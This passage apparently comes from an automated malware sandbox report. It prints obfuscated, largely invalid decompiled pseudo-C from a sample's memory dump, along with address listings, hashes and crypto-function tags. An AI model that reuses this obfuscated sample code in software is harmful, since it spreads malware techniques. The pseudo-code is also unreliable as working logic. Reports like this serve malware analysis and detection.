										asm("sbb ecx, [0x76bfadee]");
										__ecx = __ecx &  *0x6ccebff4;
										_push(__ecx);
										 *0x77142f25 =  *0x77142f25 ^ __esp;
										asm("sbb edi, 0xeb9c8217");
										asm("rcr dword [0x28a0d319], 0x83");
										asm("scasd");
										_push(0xc5916ed4);
										 *0x6264a205 =  *0x6264a205 >> 0xe8;
										__edx = __edx | 0xb812942d;
										__eax = __eax + 1;
										 *0xdbc79330 =  *0xdbc79330 >> 0x20;
										 *0x89de82ba =  *0x89de82ba - __esi;
										__edi = __edi + 1;
										__eflags =  *0xf26829e & 0x076a9cbd;
										 *0xb015eb2 =  *0xb015eb2 >> 0x6b;
										__ebp = __ebp ^  *0x203d3785;
										__ebx = __ebx +  *0x5943448d;
										asm("lodsd");
										__ecx = __ecx - 0xce067267;
										__edi = __edi + 1;
										 *0x53f066c0 =  *0x53f066c0 & __esp;
										__ah = __ah | 0x0000000c;
										asm("sbb dl, [0xda4f0c8a]");
										__eflags =  *0x7f98682c & __ah;
										asm("ror byte [0xe6448e34], 0x42");
										__ecx = 0xbe4dbc07;
										 *0xbff17414 =  *0xbff17414 ^ __dl;
										asm("ror dword [0x641ef716], 0x20");
										__al = __al + 0xe5;
										asm("sbb ebx, [0x240252e]");
										_push(0xbe4dbc07);
										__dl = __dl |  *0x8581d0a;
										__eflags =  *0x34204d21 & __eax;
										__esp = __esp |  *0x58630b68;
										 *0x33611101 =  *0x33611101 << 0x87;
										__eflags =  *0x33611101;
										if( *0x33611101 < 0) {
											 *0x616d6a79 =  *0x616d6a79 + __edx;
											__edx = __edx |  *0x467588ed;
											__ch = __ch +  *0x1506d5e4;
											__bh -  *0x7d1c2fe0 =  *0x650552c4 & 0x076a9cbd;
											__ecx = 0xffffffffbe4dbc06;
											asm("sbb edx, 0xfe2c06ea");
											asm("adc ebx, 0xe4b624ea");
											_pop(__eax);
											 *0x2ba7c934 =  *0x2ba7c934 >> 0x2e;
											 *0xc9f2cf95 =  *0xc9f2cf95 | __ebp;
											asm("adc [0x9da4499f], esp");
											__eax =  *0xe83f106a * 0xcfec;
											__ebx = __ebx - 1;
											asm("sbb esi, 0x6743f107");
											 *0x5a347005 =  *0x5a347005 >> 0x46;
											 *0x22a2bf00 =  *0x22a2bf00 >> 0x25;
											__edx =  *0x1db2726b * 0xd59;
											asm("adc [0x3e8e7880], al");
											L1();
											__edi = __edi ^  *0xf95cf2e8;
											asm("adc [0x9ae59be7], ah");
											__edx =  *0x1db2726b * 0xd59 - 1;
											__cl = __cl |  *0x8ac5a33a;
											__ecx = 0xffffffffa723472a;
											asm("sbb eax, [0x6c870a17]");
											asm("sbb ecx, 0x3487f799");
											_push(__ebp);
											__esi = __esi -  *0xfc03e28c;
											__ebx = __ebx + 0x6301361d;
											__esp = __esp + 1;
											 *0x96208104 =  *0x96208104 ^ __bh;
											__esp = __esp ^  *0xf9d8a68e;
											__cl = __cl & 0x00000080;
											 *0xe7502530 =  *0xe7502530 | __ah;
											__edx =  *0x1db2726b * 0x00000d59 - 0x00000001 &  *0xfd022d93;
											__esp = __esp +  *0x7d638489;
											__eflags = __cl & 0x000000a2;
											 *0xde3d5002 =  *0xde3d5002 << 0x8a;
											__eflags =  *0xde3d5002;
											_push(0xbe4dbc07);
											if( *0xde3d5002 >= 0) {
												__ebp =  *0xfa26627c * 0x7664;
												asm("scasb");
												__bh = 0xf6;
												_pop(__esi);
												asm("lodsb");
												 *0xc40ec7e2 =  *0xc40ec7e2 >> 0xd6;
												__edx = __edx ^  *0xade90ef5;
												__ebx = __ebx &  *0x397249be;
												__edx = __edx ^  *0x8a4d6b19;
												 *0x4bfe2d1e =  *0x4bfe2d1e >> 0x83;
												asm("adc edi, 0xbd65d411");
												asm("cmpsw");
												__ebx = __ebx +  *0x3783ead6;
												asm("sbb [0x8a0ae3f9], ch");
												__esi =  *0xeb51e766;
												__esp = __esp - 0x9192f;
												 *0xf869331c =  *0xf869331c >> 0x5b;
												__edx = __edx ^  *0x795e2337;
												__edx = __edx &  *0x4eb3e265;
												asm("sbb [0xdff0cd0d], eax");
												 *0xf2b27504 =  *0xf2b27504 >> 0xdd;
												asm("adc ebx, [0x29f4c48b]");
												_t25 = __edi;
												__edi =  *0x3d96c28b;
												 *0x3d96c28b = _t25;
												__ebx =  *0x7d91726b * 0xe2d0;
												 *0x1dfdd520 =  *0x1dfdd520 >> 0x1b;
												asm("adc [0xa554d6b3], cl");
												asm("scasb");
												__eflags =  *0xc884402d & __esp;
												 *0x48df560d =  *0x48df560d - 0xbe4dbc07;
												 *0x479d2b2 =  *0x479d2b2 ^ 0x000000f6;
												 *0x70fd82fe =  *0x70fd82fe >> 6;
												__edi =  *0x3d96c28b & 0x51c64561;
												__edx = __edx |  *0x9c088abc;
												__ecx = 0xffffffffa723472b;
												 *0x31818238 =  *0x31818238 ^ __ah;
												_pop(__ebp);
												 *0xc7070fc9 =  *0xc7070fc9 >> 0x76;
												__eax = __eax -  *0x3a18090e;
												__eflags = __eax;
												asm("rcl dword [0xbe35bafc], 0x9b");
												asm("sbb ch, [0xce1f4722]");
												_push(__esp);
												asm("sbb [0x175d9011], ebx");
												if(__eax <= 0) {
													__eax = __eax | 0x9267a577;
													asm("rcl dword [0x1f7bc86e], 0xc3");
													__esp = __esp -  *0x1986a41d;
													 *0xd0142f2d = __ebx;
													asm("sbb [0xe6eb17cb], esi");
													__bh = 0x16;
													__eflags = 0xf6;
													if(0xf6 < 0) {
														__edi = __edi +  *0x90e2c979;
														asm("adc edi, [0xddc19fee]");
														__edi =  *0x8a06486b * 0x9435;
														 *0x75617a11 = __ebp;
														__esi = __esi + 1;
														 *0xfff89f85 =  *0xfff89f85 - __ebp;
														__eflags =  *0xfff89f85;
														if( *0xfff89f85 <= 0) {
															asm("rol dword [0x4a841277], 0xf5");
															asm("movsb");
															__eflags =  *0x2f2d1986 & __al;
															__ecx =  *0x33594f0f;
															 *0x498ed69d =  *0x498ed69d ^ __esp;
															 *0x4367720d =  *0x4367720d >> 0xd5;
															asm("lodsb");
															_push(__ebp);
															asm("rcl dword [0x670e54d1], 0x66");
															__ecx =  *0x33594f0f - 0x75021c19;
															__ebp =  *0x29194a1d;
															__ebx = __ebx + 1;
															__eflags = __ebx;
															if(__ebx == 0) {
																asm("sbb edi, [0x4ba5637b]");
																__eflags = __cl - 0xc;
																asm("stosd");
																__eflags =  *0xb18a5e62 & __ebp;
																__ah = __ah - 0xc9;
																_pop(__edx);
																__esi & 0xebc40e03 = __dl & 0x000000e6;
																__ah =  *0x4f5d6d0c;
																__edx = __edx + 1;
																asm("adc esi, [0x356ac89]");
																asm("rcl dword [0xe6ebc40e], 0x95");
																__ch = __ch -  *0x67a5b212;
																__eflags = __esp - 0x2267cac7;
																if(__eflags >= 0) {
																	asm("adc esi, [0xe58adc78]");
																	if(__eflags >= 0) {
																		asm("rol dword [0xabe12572], 0x33");
																		if(__eflags < 0) {
																			asm("sbb [0x15014471], esi");
																			 *0xd665a6ef =  *0xd665a6ef ^ __edi;
																			_t36 = __edi;
																			__edi =  *0x3cda45d1;
																			 *0x3cda45d1 = _t36;
																			_push( *0xb6c52f83);
																			__eflags = __ebx -  *0x2577320d;
																			__ah = __ah ^ 0x000000b3;
																			_pop( *0x5cb1d316);
																			 *0xb9353b11 =  *0xb9353b11 ^ __edi;
																			__esp =  *0x77bdb8bd;
																			_push( *0x77bdb8bd);
																			asm("adc ebp, [0x1c1787db]");
																			asm("movsb");
																			 *0x2f2d1986 =  *0x2f2d1986 | __ah;
																			asm("adc ah, 0x14");
																			asm("rcr dword [0x712cbfd], 0xf1");
																			__al = __al ^ 0x00000010;
																			asm("adc dh, [0x582a600]");
																			asm("sbb dl, 0xb5");
																			__ebp = __ebp &  *0x7f6e2531;
																			__eflags =  *0x8a0648be & __edi;
																			__ebx = __ebx + 0x9c129435;
																			_push( *0xe77b8e89);
																			_pop( *0xba4c899);
																			__eflags = __ebx -  *0xf7ef31bc;
																			__ah = __ah + 0xe1;
																			__eflags = __ah;
																			asm("stosd");
																			if(__ah < 0) {
																				__eax = 0x10014471;
																				asm("ror dword [0x7f007487], 0x95");
																				 *0xfc2168c6 = __ch;
																				 *0x9e354588 =  *0x9e354588 + __dl;
																				 *0xa26495f5 =  *0xa26495f5 >> 0x37;
																				 *0x65d72d12 =  *0x65d72d12 - 0xf6;
																				__ecx = 0x4e8c56dd;
																				2 = 2 -  *0x13da4eb3;
																				__eflags = __esp -  *0x30252fba;
																				__esp = __esp - 1;
																				asm("sbb eax, 0xbbb81401");
																				_pop( *0x66f1fc9f);
																				__edi =  *0x30936406;
																				__eflags = __edi -  *0xeff5b4bf;
																				asm("adc [0x8a06486f], edi");
																				__eflags = __edi -  *0xf90f9435;
																				__esi = __esi +  *0x460115de;
																				 *0x38ce0665 =  *0x38ce0665 << 0x38;
																				__ebp = __ebp &  *0x1f4722bd;
																				 *0x621454ce =  *0x621454ce << 0xbe;
																				asm("sbb ebx, 0x6ea77a19");
																				__eflags =  *0x93e27b9d & __ebx;
																				asm("adc [0x87a1b707], edx");
																				asm("rcr dword [0x8a0648c1], 0x95");
																				__esi = __esi |  *0xbf149435;
																				asm("adc ebp, [0xa9c2fcba]");
																				__edi =  *0xaa8c369a;
																				__eax = 0x10014471;
																				_pop( *0xd8b47dba);
																				__eax =  *0x8a064869 * 0x9435;
																				asm("sbb ch, [0x93b7c612]");
																				__eflags = __ah & 0x000000f6;
																				__esp = __esp &  *0x345cba1e;
																				__eflags =  *0x71abe1f2 & __bl;
																				__esp = __esp + 1;
																				 *0x8a064869 * 0x00009435 &  *0x1b7e0e01 =  *0x8a064869 * 0x00009435 &  *0x1b7e0e01 | 0xe97f586e;
																				asm("adc ebp, [0xeb11fa93]");
																				 *0x4ba04f61 =  *0x4ba04f61 - 0x4e8c56dd;
																				__esp = __esp ^ 0xec1d5b13;
																				__eax = 0x15a985bc;
																				__esp = __esp - 1;
																				_push( *0x3df627ee);
																				__esp = __esp -  *0x3b305ad4;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					_t46 = _t46 &  *0x963408d2;
					 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
					_t52 = _t52 + 1;
					asm("sbb [0x3644e3a0], ch");
					asm("adc al, [0xc626bb6]");
					if(_t45 !=  *0xf205cdb5) {
						continue;
					}
					L2:
					_t53 = _t53 +  *0xcf63b7b;
					_t46 = _t46 +  *0x77da6d88;
					 *0xe6035f64 =  *0xe6035f64 ^ _t53;
					asm("adc dl, 0x8");
					if( *0xe6035f64 >= 0) {
						while(1) {
							L1:
							_t46 = _t46 &  *0x963408d2;
							 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
							_t52 = _t52 + 1;
							asm("sbb [0x3644e3a0], ch");
							asm("adc al, [0xc626bb6]");
							if(_t45 !=  *0xf205cdb5) {
								continue;
							}
							goto L2;
							do {
								goto L1;
							} while (_t45 !=  *0xf205cdb5);
							goto L2;
						}
					} else {
						asm("adc edi, 0xe2bbec73");
						asm("adc [0xc9901399], ebx");
						 *0x660d6abc =  *0x660d6abc - _t55;
						_push(0x3cc14109);
						_t55 = _t55 &  *0x4fb89bf0;
						_t46 =  *0x13625927;
						 *0x25ac2593 =  *0x25ac2593 >> 0x89;
						 *0x1d63b395 =  *0x1d63b395 ^ _t56;
						if(0x3cc1410a <= 0) {
							continue;
						} else {
							 *0x310136c9 =  *0x310136c9 << 0x39;
							asm("sbb ebp, [0xd839c0c5]");
							return _t45;
						}
					}
					L1:
					_t46 = _t46 &  *0x963408d2;
					 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
					_t52 = _t52 + 1;
					asm("sbb [0x3644e3a0], ch");
					asm("adc al, [0xc626bb6]");
				}
			}

0x0041d360
0x0041d360
0x0041d360
0x0041d360
0x0041d36b
0x0041d371
0x0041d378
0x0041d384
0x0041d38a
0x0041d390
0x0041d396
0x0041d39c
0x0041d3a3
0x0041d3a9
0x0041d3af
0x0041d3b2
0x0041d3b8
0x0041d3bf
0x0041d3c5
0x0041d3cb
0x0041d3d1
0x0041d3d8
0x0041d3df
0x0041d3e5
0x0041d3e6
0x0041d3ed
0x0041d3ee
0x0041d3ef
0x0041d3f6
0x0041d3fc
0x0041d403
0x0041d409
0x0041d410
0x0041d41c
0x0041d422
0x0041d428
0x0041d42e
0x0041d435
0x0041d437
0x0041d43d
0x0041d443
0x0041d44d
0x0041d461
0x0041d462
0x0041d468
0x0041d475
0x0041d47b
0x0041d47b
0x0041d47b
0x0041d481
0x0041d487
0x0041d48d
0x0041d493
0x0041d494
0x0041d499
0x0041d49f
0x0041d4a0
0x0041d4a3
0x0041d4a9
0x0041d4af
0x0041d4b5
0x0041d4b6
0x0041d4bc
0x0041d4c2
0x0041d4c8
0x0041d4ce
0x0041d4d8
0x0041d4d9
0x0041d4df
0x0041d4e5
0x0041d4eb
0x0041d4f1
0x0041d4f4
0x0041d4fe
0x0041d504
0x0041d505
0x0041d505
0x0041d50b
0x0041d511
0x0041d517
0x0041d517
0x0041d517
0x0041d51d
0x0041d523
0x0041d529
0x0041d52f
0x0041d52f
0x0041d536
0x0041d53c
0x0041d546
0x0041d54c
0x0041d553
0x0041d559
0x0041d55f
0x0041d565
0x0041d56b
0x0041d572
0x0041d578
0x0041d578
0x0041d57e
0x0041d584
0x0041d58a
0x0041d590
0x0041d596
0x0041d597
0x0041d59d
0x0041d5a3
0x0041d5aa
0x0041d5ab
0x0041d5b0
0x0041d5b7
0x0041d5bd
0x0041d5be
0x0041d5c5
0x0041d5cb
0x0041d5cc
0x0041d5d2
0x0041d5d9
0x0041d5df
0x0041d5e5
0x0041d5e6
0x0041d5ec
0x0041d5ed
0x0041d5f3
0x0041d5f6
0x0041d5fc
0x0041d602
0x0041d609
0x0041d60e
0x0041d614
0x0041d61b
0x0041d61d
0x0041d623
0x0041d624
0x0041d62a
0x0041d630
0x0041d636
0x0041d636
0x0041d63d
0x0041d643
0x0041d649
0x0041d64f
0x0041d65c
0x0041d662
0x0041d663
0x0041d669
0x0041d66f
0x0041d670
0x0041d677
0x0041d67d
0x0041d683
0x0041d68d
0x0041d68e
0x0041d694
0x0041d69b
0x0041d6a2
0x0041d6ac
0x0041d6b2
0x0041d6b7
0x0041d6bd
0x0041d6c3
0x0041d6c4
0x0041d6ca
0x0041d6d0
0x0041d6d6
0x0041d6dc
0x0041d6dd
0x0041d6e3
0x0041d6e9
0x0041d6ea
0x0041d6f0
0x0041d6f6
0x0041d6f9
0x0041d6ff
0x0041d705
0x0041d70b
0x0041d70e
0x0041d70e
0x0041d715
0x0041d716
0x0041d71c
0x0041d726
0x0041d727
0x0041d729
0x0041d72a
0x0041d72b
0x0041d732
0x0041d738
0x0041d73e
0x0041d744
0x0041d74b
0x0041d751
0x0041d753
0x0041d759
0x0041d75f
0x0041d765
0x0041d76b
0x0041d772
0x0041d778
0x0041d77e
0x0041d784
0x0041d78b
0x0041d791
0x0041d791
0x0041d791
0x0041d797
0x0041d7a1
0x0041d7a8
0x0041d7ae
0x0041d7af
0x0041d7b5
0x0041d7bb
0x0041d7c1
0x0041d7c8
0x0041d7ce
0x0041d7d4
0x0041d7d5
0x0041d7db
0x0041d7dc
0x0041d7e3
0x0041d7e3
0x0041d7e9
0x0041d7f0
0x0041d7f6
0x0041d7f7
0x0041d7fd
0x0041d803
0x0041d808
0x0041d80f
0x0041d815
0x0041d81b
0x0041d821
0x0041d821
0x0041d824
0x0041d82a
0x0041d830
0x0041d836
0x0041d840
0x0041d846
0x0041d847
0x0041d847
0x0041d84d
0x0041d853
0x0041d85a
0x0041d85b
0x0041d861
0x0041d867
0x0041d86d
0x0041d874
0x0041d875
0x0041d876
0x0041d87d
0x0041d883
0x0041d889
0x0041d889
0x0041d88a
0x0041d890
0x0041d896
0x0041d899
0x0041d89a
0x0041d8a0
0x0041d8a3
0x0041d8aa
0x0041d8ad
0x0041d8b3
0x0041d8b4
0x0041d8ba
0x0041d8c1
0x0041d8c7
0x0041d8cd
0x0041d8d3
0x0041d8d9
0x0041d8df
0x0041d8e6
0x0041d8ec
0x0041d8f2
0x0041d8f8
0x0041d8f8
0x0041d8f8
0x0041d8fe
0x0041d904
0x0041d90a
0x0041d90d
0x0041d913
0x0041d919
0x0041d91f
0x0041d920
0x0041d926
0x0041d927
0x0041d92d
0x0041d930
0x0041d937
0x0041d939
0x0041d93f
0x0041d942
0x0041d948
0x0041d94e
0x0041d954
0x0041d95a
0x0041d960
0x0041d966
0x0041d966
0x0041d969
0x0041d96a
0x0041d970
0x0041d975
0x0041d97c
0x0041d982
0x0041d988
0x0041d98f
0x0041d995
0x0041d99d
0x0041d9a3
0x0041d9a9
0x0041d9aa
0x0041d9af
0x0041d9b5
0x0041d9bb
0x0041d9c1
0x0041d9c7
0x0041d9cd
0x0041d9d3
0x0041d9da
0x0041d9e0
0x0041d9e8
0x0041d9ee
0x0041d9f4
0x0041d9fa
0x0041da01
0x0041da07
0x0041da0d
0x0041da13
0x0041da14
0x0041da1a
0x0041da24
0x0041da2a
0x0041da2d
0x0041da38
0x0041da3e
0x0041da45
0x0041da4a
0x0041da50
0x0041da56
0x0041da5c
0x0041da5d
0x0041da5e
0x0041da64
0x0041da64
0x0041d96a
0x0041d8e6
0x0041d8d9
0x0041d8cd
0x0041d88a
0x0041d84d
0x0041d824
0x0041d7fd
0x0041d716
0x0041d63d
0x0041d57e
0x0041d559
0x0041d536
0x0041d51d
0x0041d50b
0x0041cfa6
0x0041cfa6
0x0041cfac
0x0041cfb2
0x0041cfb8
0x0041cfb9
0x0041cfc5
0x0041cfcb
0x00000000
0x00000000
0x0041cfcd
0x0041cfcd
0x0041cfd3
0x0041cfd9
0x0041cfdf
0x0041cfe2
0x0041cfa6
0x0041cfa6
0x0041cfac
0x0041cfb2
0x0041cfb8
0x0041cfb9
0x0041cfc5
0x0041cfcb
0x00000000
0x00000000
0x00000000
0x0041cfa6
0x00000000
0x00000000
0x00000000
0x0041cfa6
0x0041cfe4
0x0041cfe4
0x0041cfea
0x0041cff6
0x0041cffc
0x0041d002
0x0041d008
0x0041d00e
0x0041d015
0x0041d01f
0x00000000
0x0041d021
0x0041d031
0x0041d038
0x0041d03e
0x0041d03e
0x0041d01f
0x0041cfa6
0x0041cfac
0x0041cfb2
0x0041cfb8
0x0041cfb9
0x0041cfc5
0x0041cfc5

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17bb315930af4e2e6efe70db28cd7d92475ccdd94bb8c934770465384c7f009c
Instruction ID: 00ee6f9bfc5c9569285fa1df4217ca6e4b8ecc935c0492086613916bfffb1b0c
Opcode Fuzzy Hash: 17bb315930af4e2e6efe70db28cd7d92475ccdd94bb8c934770465384c7f009c
Instruction Fuzzy Hash: DB023F32918791CFD715CF39D98AB423FB2F396324B08424EC9A1A75D2D338655ACF89

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1B3, Relevance: .2, Instructions: 167
COMMONCrypto

Download Yara Rule

C-Code - Quality: 38%

			E0041E1B3(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed char _t33;
				signed char _t34;
				void* _t35;
				signed int _t36;
				signed char _t44;
				void* _t48;
				void* _t51;
				signed int _t54;
				intOrPtr _t60;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				void* _t78;
				signed int _t79;

				_t75 = __esi;
				 *0xc16efa8 =  *0xc16efa8 + __edx;
				_t54 = __ecx - 1;
				asm("adc dh, [0xc48616d2]");
				 *0xddbd3ccd =  *0xddbd3ccd ^ _t77;
				asm("adc ebp, [0xb70016ef]");
				_t33 = __eax & 0x88;
				asm("scasd");
				_pop(_t71);
				_t78 = _t77 -  *0x16d24939;
				asm("sbb bl, [0x54942410]");
				 *0xaddd0fb4 =  *0xaddd0fb4 | _t33;
				 *0xef45d88d =  *0xef45d88d | _t79;
				_t60 = __edx +  *0x90e04c16;
				if(_t60 > 0) {
					L1:
					_t33 = _t33 -  *0xb0939ff7;
					_t78 = _t78 - 1;
					_t44 = 0xb7 +  *0xe217dc62 - 0xc4bbc419;
					 *0x759084e5 =  *0x759084e5 - _t44;
					_t75 = _t75 - 1;
					 *0xd173aeb0 =  *0xd173aeb0 & _t44;
				} else {
					asm("ror dword [0xa8008977], 0x63");
					 *0x45d8a8c4 =  *0x45d8a8c4 << 0x48;
					__esp = __esp |  *0x9e3f16ef;
					__edx = __edx -  *0x40ecb2a1;
					 *0x826380d6 =  *0x826380d6 + __esp;
					 *0xa8c4a800 =  *0xa8c4a800 ^ __ah;
					asm("rcr dword [0x16ef45d8], 0x8e");
					asm("adc edi, [0x9fe24b16]");
					asm("adc esp, [0x49395fc2]");
					_t30 = __dh;
					__dh =  *0x941616d2;
					 *0x941616d2 = _t30;
					 *0xdec32e33 =  *0xdec32e33 ^ __edx;
					__esi = __esi ^  *0xe0cc32c1;
					__dh =  *0x941616d2 - 0xa8;
					 *0xd8a8c4a8 =  *0xd8a8c4a8 >> 0x7c;
					__ebp = __ebp + 1;
					asm("adc [0xd6b616ef], ecx");
					if(__ebp < 0) {
						goto L1;
						do {
							do {
								do {
									do {
										goto L1;
									} while ( *0xd173aeb0 < 0);
									_t34 = _t33 & 0xddbd1c2f;
									 *0xe0cc32c1 =  *0xe0cc32c1 & _t34;
									_t79 = _t79 ^ 0xca2585c0;
									_t54 = _t54 ^  *0xcc32b2ef;
									asm("cmpsb");
									asm("rcr dword [0xcc32c1da], 0xb7");
									_t9 = _t60;
									_t60 =  *0x16efa8e0;
									 *0x16efa8e0 = _t9;
									asm("rol dword [0x7775c839], 0x0");
									_t33 = _t34 ^  *0xef45d8a8;
									_t48 =  *0x16efa8e0 +  *0x98b7a16;
									asm("rcr byte [0xa8e0cc32], 0xe9");
									_push(0xc83816ef);
								} while ( *0xc1c68ff2 != _t33);
								_t35 = _t33 + 1;
								_push(_t35);
								asm("sbb [0xef45d88d], ebp");
								_push( *0x81d04116);
								asm("sbb ch, 0x3a");
								_t71 = _t71 ^  *0x81c42916;
								_t36 = _t35;
								 *0xef45d88d =  *0xef45d88d - _t78;
								 *0xa1e75531 =  *0xa1e75531 - ((_t60 -  *0x4052173a |  *0xef45d88d) ^ 0x00000010);
								 *0xef453d99 = _t79;
								 *0xfd32ee16 =  *0xfd32ee16 - _t71;
								_pop( *0x831db40f);
								asm("adc edx, [0x6d2b16ef]");
								_t54 =  *0xe0cc32c1;
								asm("rol byte [0x8a16efa8], 0xe6");
								 *0xbe17ff2f =  *0xbe17ff2f >> 0x9a;
								_push( *0xcc32bfdd);
								asm("rol byte [0x16efa8e0], 0x99");
								_t33 = _t36 ^ 0xcc32c5f7;
								asm("rcl byte [0x16efa8e0], 0x9e");
								_t51 = (_t48 +  *0x9cba1d16 & 0x000000c6) +  *0x4fa34f2;
								 *0x32b9d9b0 = _t33;
								_t79 = _t79 + 0xefa8e0cc;
								_t60 =  *0xb3c62116;
								 *0xd601ee67 =  *0xd601ee67 | _t54;
								_t75 = 0x8dddabb;
								 *0xa2f716d2 =  *0xa2f716d2 >> 3;
							} while (0x52173a7b <= 0);
							_push( *0x395f828e);
							asm("ror byte [0x36b616d2], 0x22");
							asm("ror dword [0xebb8140b], 0x81");
							_t72 = _t71 &  *0xcc32aece;
							 *0x9c01269e =  *0x9c01269e + 0x8dddabb;
							asm("scasd");
							asm("rcl byte [0x5fc3ccf9], 0x56");
							 *0x16d24939 =  *0x16d24939 + (_t54 - 0x00000001 -  *0xa816efa8 &  *0x9d8d8ce2);
							_t60 = _t60 - 0x869af2ba + 1;
							 *0xf2c1ab9c =  *0xf2c1ab9c - _t72;
							 *0x416efa8 =  *0x416efa8 - (_t33 &  *0xcc32c1d7);
							_t75 = 0xbda7983e;
							 *0x5fbed3f5 =  *0x5fbed3f5 - _t51;
							_t79 = _t79 +  *0xe0cc32cc & 0x16d24939;
							asm("ror byte [0x71c621c], 0x77");
							asm("movsb");
							_t54 = 0xffffffffe0cc31da;
							_t33 =  *0xa899d1b4;
							_pop(_t71);
							asm("adc edx, 0x16d24939");
						} while (_t72 +  *0x16ef45d8 !=  *0x9ba0f4be);
						asm("adc edi, [0x2e33947a]");
						return _t33;
					} else {
						_push( *0x52173a78);
						__eax = __eax + 1;
						_push(__eax);
						asm("rol dword [0xef45d88d], 0x18");
						__al = __al | 0x00000016;
						return __eax;
					}
				}
			}

0x0041e1b3
0x0041e1bc
0x0041e1cf
0x0041e1d0
0x0041e1d6
0x0041e1e4
0x0041e1f0
0x0041e1f2
0x0041e1f3
0x0041e1f4
0x0041e1fa
0x0041e200
0x0041e206
0x0041e20c
0x0041e212
0x0041df59
0x0041df5b
0x0041df67
0x0041df6e
0x0041df74
0x0041df7a
0x0041df81
0x0041e218
0x0041e218
0x0041e21f
0x0041e226
0x0041e232
0x0041e23e
0x0041e244
0x0041e24a
0x0041e263
0x0041e26f
0x0041e275
0x0041e275
0x0041e275
0x0041e27b
0x0041e281
0x0041e287
0x0041e295
0x0041e29c
0x0041e29d
0x0041e2a3
0x00000000
0x0041df59
0x0041df59
0x0041df59
0x0041df59
0x00000000
0x00000000
0x0041df99
0x0041df9e
0x0041dfaa
0x0041dfb0
0x0041dfbc
0x0041dfc3
0x0041dfca
0x0041dfca
0x0041dfca
0x0041dfd0
0x0041dfdd
0x0041dfe3
0x0041dfef
0x0041dff6
0x0041dff6
0x0041e007
0x0041e008
0x0041e009
0x0041e00f
0x0041e015
0x0041e024
0x0041e03d
0x0041e044
0x0041e053
0x0041e059
0x0041e05f
0x0041e065
0x0041e071
0x0041e07d
0x0041e083
0x0041e08a
0x0041e091
0x0041e097
0x0041e0a7
0x0041e0ac
0x0041e0b3
0x0041e0b9
0x0041e0be
0x0041e0c4
0x0041e0ca
0x0041e0d0
0x0041e0d6
0x0041e0d6
0x0041e0e9
0x0041e0f0
0x0041e0f7
0x0041e110
0x0041e11f
0x0041e137
0x0041e138
0x0041e13f
0x0041e148
0x0041e149
0x0041e154
0x0041e15a
0x0041e15f
0x0041e165
0x0041e16b
0x0041e172
0x0041e179
0x0041e19a
0x0041e19f
0x0041e1a0
0x0041e1a0
0x0041e1ac
0x0041e1b2
0x0041e2a9
0x0041e2a9
0x0041e2af
0x0041e2b0
0x0041e2b1
0x0041e2b8
0x0041e2ba
0x0041e2ba
0x0041e2a3

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b76b3c5011864f8695802b6ce81df8ed6c6e997ada48a73cc1671824ea3dac2
Instruction ID: ea23074a00889b9d0c64607a77df898d9a7f3224492ef786768c99afa501a118
Opcode Fuzzy Hash: 8b76b3c5011864f8695802b6ce81df8ed6c6e997ada48a73cc1671824ea3dac2
Instruction Fuzzy Hash: E281E172A493C0CFE705DF79E8AA7863F72E78A324B0C028DD9A25B1D2C3741066DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
